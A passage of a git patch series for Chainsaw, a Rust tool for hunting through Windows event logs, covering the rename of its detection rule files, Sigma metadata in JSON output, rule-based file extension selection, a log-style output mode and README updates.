b/rules/account_tampering/new_user_created.yml similarity index 100% rename from chainsaw_rules/account_tampering/new_user_created.yml rename to rules/account_tampering/new_user_created.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_global_group.yml rename to rules/account_tampering/user_added_to_global_group.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_local_group.yml rename to rules/account_tampering/user_added_to_local_group.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_universal_group.yml rename to rules/account_tampering/user_added_to_universal_group.yml diff --git a/chainsaw_rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml similarity index 100% rename from chainsaw_rules/antivirus/f-secure.yml rename to rules/antivirus/f-secure.yml diff --git a/chainsaw_rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml similarity index 100% rename from chainsaw_rules/antivirus/kaspersky.yml rename to rules/antivirus/kaspersky.yml diff --git a/chainsaw_rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml similarity index 100% rename from chainsaw_rules/antivirus/sophos.yml rename to rules/antivirus/sophos.yml diff --git a/chainsaw_rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml similarity index 100% rename from chainsaw_rules/antivirus/windows_defender.yml rename to rules/antivirus/windows_defender.yml diff --git a/chainsaw_rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/batch_logon.yml rename to rules/lateral_movement/batch_logon.yml diff --git a/chainsaw_rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/interactive_logon.yml rename to rules/lateral_movement/interactive_logon.yml diff --git a/chainsaw_rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/network_logon.yml rename to rules/lateral_movement/network_logon.yml diff --git a/chainsaw_rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/rdp_logon.yml rename to rules/lateral_movement/rdp_logon.yml diff --git a/chainsaw_rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/service_logon.yml rename to rules/lateral_movement/service_logon.yml diff --git a/chainsaw_rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/unlock_logon.yml rename to rules/lateral_movement/unlock_logon.yml diff --git a/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml rename to rules/log_tampering/security_audit_log_was_cleared.yml diff --git a/chainsaw_rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/system_log_was_cleared.yml rename to rules/log_tampering/system_log_was_cleared.yml diff --git a/chainsaw_rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml similarity index 100% rename from chainsaw_rules/login_attacks/account_brute_force.yml rename to rules/login_attacks/account_brute_force.yml diff --git a/chainsaw_rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml similarity index 100% rename from chainsaw_rules/service_tampering/event_log.yml rename to rules/service_tampering/event_log.yml From 320e2fff894d36ddc9280a7bd10f056edfa83776 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 15:32:18 +0100 Subject: [PATCH 48/77] feat: add in additional sigma fields to json output --- src/cli.rs | 47 +++++++++++++++++++++++++++++++++---------- src/main.rs | 11 ++++++++-- src/rule/sigma.rs | 51 ++++++++++++++++++++++++++++++++++++++++++++--- 3 files changed, 94 insertions(+), 15 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 1974e42b..8d4badaa 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -559,6 +559,21 @@ pub struct Detection<'a> { pub level: &'a Level, pub source: RuleKind, pub status: &'a Status, + + #[serde(skip_serializing_if = "Option::is_none")] + pub sigma: Option>, +} + +#[derive(Debug, Serialize)] +pub struct Sigma<'a> { + #[serde(skip_serializing_if = "Option::is_none")] + pub id: &'a Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub logsource: &'a Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub references: &'a Option>, + #[serde(skip_serializing_if = "Option::is_none")] + pub tags: &'a Option>, } pub fn print_json( @@ -600,17 +615,29 @@ pub fn print_json( source: RuleKind::Chainsaw, status: &c.status, timestamp: localised, + + sigma: None, }), - Rule::Sigma(s) => detections.push(Detection { - authors: &s.authors, - group: &hunt.group, - kind: &d.kind, - level: &s.level, - name: &s.name, - source: RuleKind::Sigma, - status: &s.status, - timestamp: localised, - }), + Rule::Sigma(s) => { + let sigma = Sigma { + id: &s.id, + logsource: &s.logsource, + references: &s.references, + tags: &s.tags, + }; + detections.push(Detection { + authors: &s.authors, + group: &hunt.group, + kind: &d.kind, + level: &s.level, + name: &s.name, + source: RuleKind::Sigma, + status: &s.status, + timestamp: localised, + + sigma: Some(sigma), + }) + } } } detections diff --git a/src/main.rs b/src/main.rs index d24b230f..7e1ea627 100644 --- a/src/main.rs +++ b/src/main.rs @@ -227,7 +227,7 @@ fn run() -> Result<()> { match opts.cmd { Command::Hunt { rules, - path, + mut path, mapping, rule, @@ -255,7 +255,13 @@ fn run() -> Result<()> { if !opts.no_banner { print_title(); } - let mut rules = vec![rules]; + let mut rs = vec![]; + if path.is_empty() { + path = vec![rules]; + } else { + rs = vec![rules]; + } + let mut rules = rs; if let Some(rule) = rule { rules.extend(rule) }; @@ -273,6 +279,7 @@ fn run() -> Result<()> { "[+] Loading detection rules from: {}", rules .iter() + .chain(sigma.iter()) .map(|r| r.display().to_string()) .collect::>() .join(", ") diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 052a39fb..e67b6f81 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -26,6 +26,15 @@ pub struct Rule { pub description: String, pub level: Level, pub status: Status, + + #[serde(default)] + pub id: Option, + #[serde(default)] + pub logsource: Option, + #[serde(default)] + pub references: Option>, + #[serde(default)] + pub tags: Option>, } #[derive(Clone, Debug, Deserialize, Serialize)] @@ -51,19 +60,37 @@ struct Header { #[serde(default)] pub author: Option, #[serde(default)] + pub id: Option, + #[serde(default)] + pub logsource: Option, + #[serde(default)] pub references: Option>, #[serde(default)] pub status: Option, + #[serde(default)] + pub tags: Option>, +} + +#[derive(Clone, Debug, Deserialize, Serialize)] +pub struct LogSource { + #[serde(default, skip_serializing_if = "Option::is_none")] + pub category: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub definition: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub product: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub service: Option, } #[derive(Clone, Deserialize)] struct Sigma { + #[serde(default)] + pub detection: Option, #[serde(default, flatten)] pub header: Option
, #[serde(default)] pub level: Option, - #[serde(default)] - pub detection: Option, } impl Sigma { @@ -81,9 +108,21 @@ impl Sigma { } else { tau.insert("status".into(), "experimental".into()); } + if let Some(id) = header.id { + tau.insert("id".into(), id.into()); + } + if let Some(logsource) = header.logsource { + tau.insert( + "logsource".into(), + serde_yaml::to_value(logsource).expect("could not serialise logsource"), + ); + } if let Some(references) = header.references { tau.insert("references".into(), references.into()); } + if let Some(tags) = header.tags { + tau.insert("tags".into(), tags.into()); + } if let Some(author) = header.author { tau.insert( "authors".into(), @@ -711,8 +750,14 @@ pub fn load(rule: &Path) -> Result> { if let Some(detection) = main.detection { let (detection, agg) = prepare(detection, None)?; let tau = detections_to_tau(detection)?; - if let Some(level) = main.level { + if let Some(level) = &main.level { + let level = match level.as_str() { + "critical" | "high" | "medium" | "low" => level.to_owned(), + _ => "info".to_owned(), + }; rule.insert("level".into(), level.into()); + } else { + rule.insert("level".into(), "info".into()); } for (k, v) in tau { rule.insert(k, v); From 7544b8ad45b39446d8c4c9131ba9099241838afd Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 15:38:58 +0100 Subject: [PATCH 49/77] feat: add in false positives for sigma rules too --- src/cli.rs | 3 +++ src/rule/sigma.rs | 7 +++++++ 2 files changed, 10 insertions(+) diff --git a/src/cli.rs b/src/cli.rs index 8d4badaa..086d96f7 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -566,6 +566,8 @@ pub struct Detection<'a> { #[derive(Debug, Serialize)] pub struct Sigma<'a> { + #[serde(skip_serializing_if = "Option::is_none")] + pub falsepositives: &'a Option>, #[serde(skip_serializing_if = "Option::is_none")] pub id: &'a Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -620,6 +622,7 @@ pub fn print_json( }), Rule::Sigma(s) => { let sigma = Sigma { + falsepositives: &s.falsepositives, id: &s.id, logsource: &s.logsource, references: &s.references, diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index e67b6f81..21fa84fe 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -27,6 +27,8 @@ pub struct Rule { pub level: Level, pub status: Status, + #[serde(default)] + pub falsepositives: Option>, #[serde(default)] pub id: Option, #[serde(default)] @@ -60,6 +62,8 @@ struct Header { #[serde(default)] pub author: Option, #[serde(default)] + pub falsepositives: Option>, + #[serde(default)] pub id: Option, #[serde(default)] pub logsource: Option, @@ -108,6 +112,9 @@ impl Sigma { } else { tau.insert("status".into(), "experimental".into()); } + if let Some(falsepositives) = header.falsepositives { + tau.insert("falsepositives".into(), falsepositives.into()); + } if let Some(id) = header.id { tau.insert("id".into(), id.into()); } From ede5c85de07fd09a6054e739e6b56dbf8876912c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 4 Jul 2022 19:19:10 +0100 Subject: [PATCH 50/77] feat: parse rule and mapping files to determine file extensions to load --- src/file/mod.rs | 24 +++++++++---- src/hunt.rs | 20 +++++++++-- src/lib.rs | 2 +- src/main.rs | 94 +++++++++++++++++++++++++++++++++++++++++-------- src/rule/mod.rs | 9 +++++ 5 files changed, 125 insertions(+), 24 deletions(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index c0245a60..22fa7349 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -1,3 +1,4 @@ +use std::collections::HashSet; use std::fs; use std::path::{Path, PathBuf}; @@ -22,7 +23,7 @@ pub struct Documents<'a> { iterator: Box> + 'a>, } -#[derive(Clone, Debug, PartialEq, Deserialize, Serialize)] +#[derive(Clone, Debug, PartialEq, Deserialize, Serialize, Hash, Eq)] #[serde(rename_all = "snake_case")] pub enum Kind { Evtx, @@ -31,6 +32,17 @@ pub enum Kind { Unknown, } +impl Kind { + pub fn extensions(&self) -> Option> { + match self { + Kind::Evtx => Some(vec!["evtx".to_string()]), + Kind::Json => Some(vec!["json".to_string()]), + Kind::Xml => Some(vec!["xml".to_string()]), + Kind::Unknown => None, + } + } +} + impl<'a> Iterator for Documents<'a> { type Item = crate::Result; @@ -86,7 +98,7 @@ impl Reader { }) } else { anyhow::bail!( - "file type is not currently supported - {}", + "file type is not currently supported - {}, use --skip-errors to continue", file.display() ) } @@ -161,7 +173,7 @@ impl Reader { pub fn get_files( path: &PathBuf, - extension: &Option, + extensions: &Option>, skip_errors: bool, ) -> crate::Result> { let mut files: Vec = vec![]; @@ -201,11 +213,11 @@ pub fn get_files( } } }; - files.extend(get_files(&dir.path(), extension, skip_errors)?); + files.extend(get_files(&dir.path(), extensions, skip_errors)?); } - } else if let Some(extension) = extension { + } else if let Some(e) = extensions { if let Some(ext) = path.extension() { - if ext == extension.as_str() { + if e.contains(&ext.to_string_lossy().into_owned()) { files.push(path.to_path_buf()); } } diff --git a/src/hunt.rs b/src/hunt.rs index 35ffbe12..48752926 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -359,8 +359,8 @@ impl Hunt { } pub struct HunterInner { - hunts: Vec, - rules: BTreeMap, + pub hunts: Vec, + pub rules: BTreeMap, load_unknown: bool, local: bool, @@ -371,7 +371,7 @@ pub struct HunterInner { } pub struct Hunter { - inner: HunterInner, + pub inner: HunterInner, } impl Hunter { @@ -607,6 +607,20 @@ impl Hunter { pub fn rules(&self) -> &BTreeMap { &self.inner.rules } + pub fn extensions(&self) -> HashSet { + let mut extensions = HashSet::new(); + for rule in &self.inner.rules { + if let Some(e) = FileKind::extensions(&rule.1.types()) { + extensions.extend(e.iter().cloned()); + } + } + for hunt in &self.inner.hunts { + if let Some(e) = FileKind::extensions(&hunt.file) { + extensions.extend(e.iter().cloned()); + } + } + extensions + } fn skip(&self, timestamp: NaiveDateTime) -> crate::Result { if self.inner.from.is_some() || self.inner.to.is_some() { diff --git a/src/lib.rs b/src/lib.rs index d69a30d3..ebb9476b 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -3,7 +3,7 @@ extern crate anyhow; pub(crate) use anyhow::Result; -pub use file::{evtx, get_files, Reader}; +pub use file::{evtx, get_files, Kind as FileKind, Reader}; pub use hunt::{Hunter, HunterBuilder}; pub use rule::{ lint, load, sigma, Filter, Kind as RuleKind, Level as RuleLevel, Status as RuleStatus, diff --git a/src/main.rs b/src/main.rs index 7e1ea627..6832b230 100644 --- a/src/main.rs +++ b/src/main.rs @@ -54,8 +54,8 @@ enum Command { #[structopt(group = "format", long = "csv", requires("output"))] csv: bool, /// Only hunt through files with the provided extension. - #[structopt(long = "extension")] - extension: Option, + #[structopt(long = "extension", number_of_values = 1)] + extension: Option>, /// The timestamp to hunt from. Drops any documents older than the value provided. #[structopt(long = "from")] from: Option, @@ -129,8 +129,8 @@ enum Command { regexp: Option>, /// Only search through files with the provided extension. - #[structopt(long = "extension")] - extension: Option, + #[structopt(long = "extension", number_of_values = 1)] + extension: Option>, /// The timestamp to search from. Drops any documents older than the value provided. #[structopt(long = "from")] from: Option, @@ -267,14 +267,6 @@ fn run() -> Result<()> { }; let sigma = sigma.unwrap_or_default(); - cs_eprintln!( - "[+] Loading event logs from: {}", - path.iter() - .map(|p| p.display().to_string()) - .collect::>() - .join(", ") - ); - cs_eprintln!( "[+] Loading detection rules from: {}", rules @@ -364,10 +356,54 @@ fn run() -> Result<()> { hunter = hunter.to(to); } let hunter = hunter.build()?; + + /* if no user-defined extensions are specified, then we parse rules and + mappings to build a list of file extensions that should be loaded */ + let mut scratch = HashSet::new(); + let message; + let exts = if load_unknown { + message = "*".to_string(); + None + } else { + scratch.extend(hunter.extensions()); + if scratch.is_empty() { + return Err(anyhow::anyhow!( + "No valid file extensions for the 'kind' specified in the mapping or rules files" + )); + } + if let Some(e) = extension { + // User has provided specific extensions + scratch = scratch + .intersection(&HashSet::from_iter(e.iter().cloned())) + .cloned() + .collect(); + if scratch.is_empty() { + return Err(anyhow::anyhow!( + "The specified file extension is not supported. Use --load-unknown to force loading", + )); + } + }; + message = scratch + .iter() + .map(|x| format!(".{}", x)) + .collect::>() + .join(", "); + Some(scratch) + }; + + cs_eprintln!( + "[+] Loading event logs from: {} (extensions: {})", + path.iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", "), + message + ); + let mut files = vec![]; let mut size = ByteSize::mb(0); for path in &path { - let res = get_files(path, &extension, skip_errors)?; + let res = get_files(path, &exts, skip_errors)?; for i in &res { size += i.metadata()?.len(); } @@ -509,16 +545,46 @@ fn run() -> Result<()> { std::env::current_dir().expect("could not get current working directory"), ); } + let types = if let Some(e) = &extension { + Some(HashSet::from_iter(e.clone())) + } else { + None + }; + let mut files = vec![]; let mut size = ByteSize::mb(0); for path in &paths { - let res = get_files(path, &extension, skip_errors)?; + let res = get_files(path, &types, skip_errors)?; for i in &res { size += i.metadata()?.len(); } files.extend(res); } + if let Some(ext) = &extension { + cs_eprintln!( + "[+] Loading event logs from: {} (extensions: {})", + paths + .iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", "), + ext.iter() + .map(|x| format!(".{}", x)) + .collect::>() + .join(", ") + ) + } else { + cs_eprintln!( + "[+] Loading event logs from: {}", + paths + .iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", "), + ) + }; + if files.is_empty() { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 4f972978..68da2ccf 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,3 +1,4 @@ +use crate::file::Kind as FileKind; use std::collections::HashSet; use std::fmt; use std::path::Path; @@ -50,6 +51,14 @@ impl Rule { } } + #[inline] + pub fn types(&self) -> &FileKind { + match self { + Self::Chainsaw(c) => &c.kind, + Self::Sigma(_) => &FileKind::Unknown, + } + } + #[inline] pub fn name(&self) -> &String { match self { From dac08f1f403fbdc94c39e58be66518e98cfbfd58 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:09:27 +0100 Subject: [PATCH 51/77] refactor: clean up some inconsistencies --- src/hunt.rs | 21 +++++++++++---------- src/rule/mod.rs | 3 ++- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/src/hunt.rs b/src/hunt.rs index 48752926..68521e58 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -359,8 +359,8 @@ impl Hunt { } pub struct HunterInner { - pub hunts: Vec, - pub rules: BTreeMap, + hunts: Vec, + rules: BTreeMap, load_unknown: bool, local: bool, @@ -371,7 +371,7 @@ pub struct HunterInner { } pub struct Hunter { - pub inner: HunterInner, + inner: HunterInner, } impl Hunter { @@ -600,13 +600,6 @@ impl Hunter { Ok(detections) } - pub fn hunts(&self) -> &Vec { - &self.inner.hunts - } - - pub fn rules(&self) -> &BTreeMap { - &self.inner.rules - } pub fn extensions(&self) -> HashSet { let mut extensions = HashSet::new(); for rule in &self.inner.rules { @@ -622,6 +615,14 @@ impl Hunter { extensions } + pub fn hunts(&self) -> &Vec { + &self.inner.hunts + } + + pub fn rules(&self) -> &BTreeMap { + &self.inner.rules + } + fn skip(&self, timestamp: NaiveDateTime) -> crate::Result { if self.inner.from.is_some() || self.inner.to.is_some() { // TODO: Not sure if this is correct... diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 68da2ccf..cdc0d52e 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,4 +1,3 @@ -use crate::file::Kind as FileKind; use std::collections::HashSet; use std::fmt; use std::path::Path; @@ -14,6 +13,8 @@ use tau_engine::{ Document, }; +use crate::file::Kind as FileKind; + pub use self::chainsaw::Rule as Chainsaw; pub use self::sigma::Rule as Sigma; From 7fbfbf04e8e0be29d802bdee815c1f98882f235e Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:20:16 +0100 Subject: [PATCH 52/77] fix: load unknown was not handled correctly in file reader --- src/file/mod.rs | 21 ++++++++++++++++++--- 1 file changed, 18 insertions(+), 3 deletions(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index 22fa7349..ff3c3588 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -88,6 +88,19 @@ impl Reader { }), _ => { if load_unknown { + if let Ok(parser) = EvtxParser::load(file) { + return Ok(Self { + parser: Parser::Evtx(parser), + }); + } else if let Ok(parser) = JsonParser::load(file) { + return Ok(Self { + parser: Parser::Json(parser), + }); + } else if let Ok(parser) = XmlParser::load(file) { + return Ok(Self { + parser: Parser::Xml(parser), + }); + } if skip_errors { cs_eyellowln!( "file type is not currently supported - {}", @@ -98,7 +111,7 @@ impl Reader { }) } else { anyhow::bail!( - "file type is not currently supported - {}, use --skip-errors to continue", + "file type is not currently supported - {}, use --skip-errors to continue...", file.display() ) } @@ -126,12 +139,14 @@ impl Reader { } if skip_errors { cs_eyellowln!("file type is not known - {}", file.display()); - Ok(Self { parser: Parser::Unknown, }) } else { - anyhow::bail!("file type is not known - {}", file.display()) + anyhow::bail!( + "file type is not known - {}, use --skip-errors to continue...", + file.display() + ) } } else { Ok(Self { From f124c82b0848ff25d2ed96dc41c9a77de6f7d18e Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:27:09 +0100 Subject: [PATCH 53/77] tweak: set groups to true for aggregates so we don't miss data Due to how mappings work we can't easily tell without a lot of preprocessing what is an aggregation rule and what is not plus we would then be inconsistent. So now we default that to true. --- src/cli.rs | 1 - src/hunt.rs | 6 +++--- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 086d96f7..a6bacb2d 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -141,7 +141,6 @@ pub fn print_detections( .entry(&hunt.group) .or_insert((vec![], HashSet::new())); // NOTE: We only support count in aggs atm so we can inject that value in...! - // NOTE: This will not work for sigma based aggs... if hunt.is_aggregation() { (*headers).0.push("count".to_owned()); (*headers).1.insert("count".to_owned()); diff --git a/src/hunt.rs b/src/hunt.rs index 68521e58..90a573d8 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -351,10 +351,10 @@ pub struct Hunt { impl Hunt { pub fn is_aggregation(&self) -> bool { - if let HuntKind::Rule { aggregate, .. } = &self.kind { - return aggregate.is_some(); + match &self.kind { + HuntKind::Group { .. } => true, + HuntKind::Rule { aggregate, .. } => aggregate.is_some(), } - false } } From 050feca023548c280f406d86a1d3ed8cfc708e20 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 20:32:49 +0100 Subject: [PATCH 54/77] feat: add rule kind to metadata output --- src/cli.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/cli.rs b/src/cli.rs index a6bacb2d..89493edc 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -308,6 +308,7 @@ pub fn print_detections( if metadata { let mut table = Table::new(); table.add_row(Row::new(vec![ + cell!("").style_spec("c"), cell!("name").style_spec("c"), cell!("authors").style_spec("c"), cell!("level").style_spec("c"), @@ -317,6 +318,7 @@ pub fn print_detections( match rule { Rule::Chainsaw(c) => { table.add_row(Row::new(vec![ + cell!('c'), cell!(split_tag(&c.name)), cell!(c.authors.join("\n")), cell!(c.level), @@ -325,6 +327,7 @@ pub fn print_detections( } Rule::Sigma(s) => { table.add_row(Row::new(vec![ + cell!('σ'), cell!(split_tag(&s.name)), cell!(s.authors.join("\n")), cell!(s.level), From 3cbc160fca3a92809f3d1b66037f2bb4d4c2f052 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 21:29:35 +0100 Subject: [PATCH 55/77] feat: add log like output option --- src/cli.rs | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++++ src/main.rs | 6 +++ 2 files changed, 112 insertions(+) diff --git a/src/cli.rs b/src/cli.rs index 89493edc..da43b9a9 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -106,6 +106,112 @@ pub struct Hit<'a> { rule: &'a Rule, } +pub fn print_log( + detections: &[Detections], + hunts: &[Hunt], + rules: &BTreeMap, + local: bool, + timezone: Option, +) -> crate::Result<()> { + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); + let mut rule_width = 1; + for rule in rules.values() { + let width = rule.name().len(); + if width > rule_width { + rule_width = width; + } + } + + let mut rows = vec![]; + for detection in detections { + for hit in &detection.hits { + rows.push((hit, &detection.kind)); + } + } + rows.sort_by(|x, y| x.0.timestamp.cmp(&y.0.timestamp)); + for (hit, kind) in rows { + let hunt = &hunts.get(&hit.hunt).expect("could not get hunt"); + let rule = &rules.get(&hit.rule).expect("could not get rule"); + let mut columns = vec![]; + + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(hit.timestamp, Utc).to_rfc3339() + }; + columns.push(localised.to_string()); + + let count; + let document = match kind { + Kind::Individual { document } => { + count = 1; + document + } + Kind::Aggregate { documents } => { + count = documents.len(); + documents.first().expect("could not get document") + } + }; + + let name = match rule { + Rule::Chainsaw(rule) => { + columns.push("c".to_string()); + &rule.name + } + Rule::Sigma(rule) => { + columns.push("σ".to_string()); + &rule.name + } + }; + //columns.push(format!("{: 6}", count)); + columns.push(name.to_string()); + columns.push(format!("{}", count)); + + let mut values = vec![]; + for field in hunt.mapper.fields() { + if field.visible { + let wrapper; + let mapped = match &document.kind { + FileKind::Evtx => { + wrapper = crate::evtx::Wrapper(&document.data); + hunt.mapper.mapped(&wrapper) + } + FileKind::Json | FileKind::Xml => hunt.mapper.mapped(&document.data), + FileKind::Unknown => continue, + }; + let fields: HashMap<_, _> = + hunt.mapper.fields().iter().map(|f| (&f.name, f)).collect(); + if let Some(field) = fields.get(&field.name) { + if let Some(value) = mapped.find(&field.from) { + match value.to_string() { + Some(v) => { + values.push(v); + } + None => { + values.push("".to_string()); + } + } + } + } + } + } + columns.push(values.join(" :: ")); + + println!("{}", columns.join(" | ")); + } + Ok(()) +} + pub fn print_detections( detections: &[Detections], hunts: &[Hunt], diff --git a/src/main.rs b/src/main.rs index 6832b230..540bb1a4 100644 --- a/src/main.rs +++ b/src/main.rs @@ -83,6 +83,9 @@ enum Command { /// The file/directory to output to. #[structopt(short = "o", long = "output")] output: Option, + /// Print the output in log like format. + #[structopt(group = "format", long = "log")] + log: bool, /// Supress informational output. #[structopt(short = "q")] quiet: bool, @@ -244,6 +247,7 @@ fn run() -> Result<()> { local, metadata, output, + log, quiet, sigma, skip_errors, @@ -428,6 +432,8 @@ fn run() -> Result<()> { cli::print_csv(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else if json { cli::print_json(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; + } else if log { + cli::print_log(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, From bfae57f0f430d793cefcf45fa1d73a9169587601 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 5 Jul 2022 21:30:03 +0100 Subject: [PATCH 56/77] tweak: flatten sigma output in json format --- src/cli.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/cli.rs b/src/cli.rs index da43b9a9..dc88a06e 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -668,7 +668,7 @@ pub struct Detection<'a> { pub source: RuleKind, pub status: &'a Status, - #[serde(skip_serializing_if = "Option::is_none")] + #[serde(flatten, skip_serializing_if = "Option::is_none")] pub sigma: Option>, } From 63bc7e12d929a9bac5257b6c17891303a1d51938 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Tue, 5 Jul 2022 22:19:21 +0100 Subject: [PATCH 57/77] refactor: simplifying extension parsing logic for search --- src/main.rs | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/src/main.rs b/src/main.rs index 540bb1a4..0e4344f9 100644 --- a/src/main.rs +++ b/src/main.rs @@ -551,12 +551,8 @@ fn run() -> Result<()> { std::env::current_dir().expect("could not get current working directory"), ); } - let types = if let Some(e) = &extension { - Some(HashSet::from_iter(e.clone())) - } else { - None - }; + let types = extension.as_ref().map(|e| HashSet::from_iter(e.clone())); let mut files = vec![]; let mut size = ByteSize::mb(0); for path in &paths { From 0d28a635e23e3de0a29ffadd5306d7c3cea6c5c5 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Tue, 5 Jul 2022 22:44:49 +0100 Subject: [PATCH 58/77] docs: building out README and help output for v2 release --- README.md | 834 +++++++--------------------- chainsaw.png => images/chainsaw.png | Bin src/main.rs | 34 +- 3 files changed, 212 insertions(+), 656 deletions(-) rename chainsaw.png => images/chainsaw.png (100%) diff --git a/README.md b/README.md index daea41c8..342a5992 100644 --- a/README.md +++ b/README.md @@ -4,26 +4,119 @@ Rapidly Search and Hunt through Windows Event Logs

- + --- -Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules. +Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules. ## Features ---- - - :mag: Search and extract event log records by event IDs, string matching, and regex patterns - - :dart: Hunt for threats using [Sigma](https://github.com/SigmaHQ/sigma) detection rules and custom built-in detection logic + - :dart: Hunt for threats using [Sigma](https://github.com/SigmaHQ/sigma) detection rules and custom Chainsaw detection rules + - :mag: Search and extract event log records by string matching, and regex patterns - :zap: Lightning fast, written in rust, wrapping the [EVTX parser](https://github.com/omerbenamram/evtx) library by [@OBenamram](https://twitter.com/obenamram?lang=en) + - :feather: Clean and lightweight execution and output formats without unnecessary bloat - :fire: Document tagging (detection logic matching) provided by the [TAU Engine](https://github.com/countercept/tau-engine) Library - - :bookmark_tabs: Output in an ASCII table format, CSV format, or JSON format + - :bookmark_tabs: Output results in a variety of formats, such as ASCII table format, CSV format, and JSON format + - :computer: Can be run on MacOS, Linux and Windows +--- + $ ./chainsaw hunt evtx_attack_samples -s sigma_rules --mapping mappings/sigma-event-logs.yml --level critical + + ██████╗██╗ ██╗ █████╗ ██╗███╗ ██╗███████╗ █████╗ ██╗ ██╗ + ██╔════╝██║ ██║██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ 